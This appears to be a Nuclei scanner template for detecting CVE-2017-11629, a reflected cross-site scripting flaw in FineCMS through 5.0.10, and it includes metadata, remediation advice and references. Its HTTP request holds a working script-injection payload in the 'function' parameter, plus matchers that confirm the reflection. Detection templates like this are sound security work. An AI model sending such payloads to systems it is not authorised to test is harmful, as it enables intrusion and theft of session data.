2022-08-29 07:08:38 +00:00
id : CVE-2017-11629
info :
2022-09-08 13:28:46 +00:00
name : FineCMS <=5.0.10 - Cross-Site Scripting
2022-08-29 07:08:38 +00:00
author : ritikchaddha
severity : medium
description : |
2022-09-08 13:28:46 +00:00
FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability.
2022-08-29 07:08:38 +00:00
reference :
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
2022-08-30 10:44:21 +00:00
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-08-29 07:08:38 +00:00
classification :
2022-08-30 10:44:21 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-08-29 07:08:38 +00:00
cve-id : CVE-2017-11629
2022-08-30 10:44:21 +00:00
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.001
2024-03-23 09:28:19 +00:00
epss-percentile : 0.40119
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:*
2022-08-29 07:08:38 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 13:22:34 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : finecms
product : finecms
2022-08-29 07:08:38 +00:00
tags : cve,cve2017,xss,finecms
2023-04-27 04:28:59 +00:00
http :
2022-08-29 07:08:38 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<script>alert(document.domain)</script>p不存在'
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100d01d92bbe3a4ba9ea85de6f3a033ae4aa2b93a18bd1629682789b01668ec35140221008619ec2e6de780f1c714003d002cb9e11f38bbb4b01264975b377553dface393:922c64590222798bb761d5b6d8e72950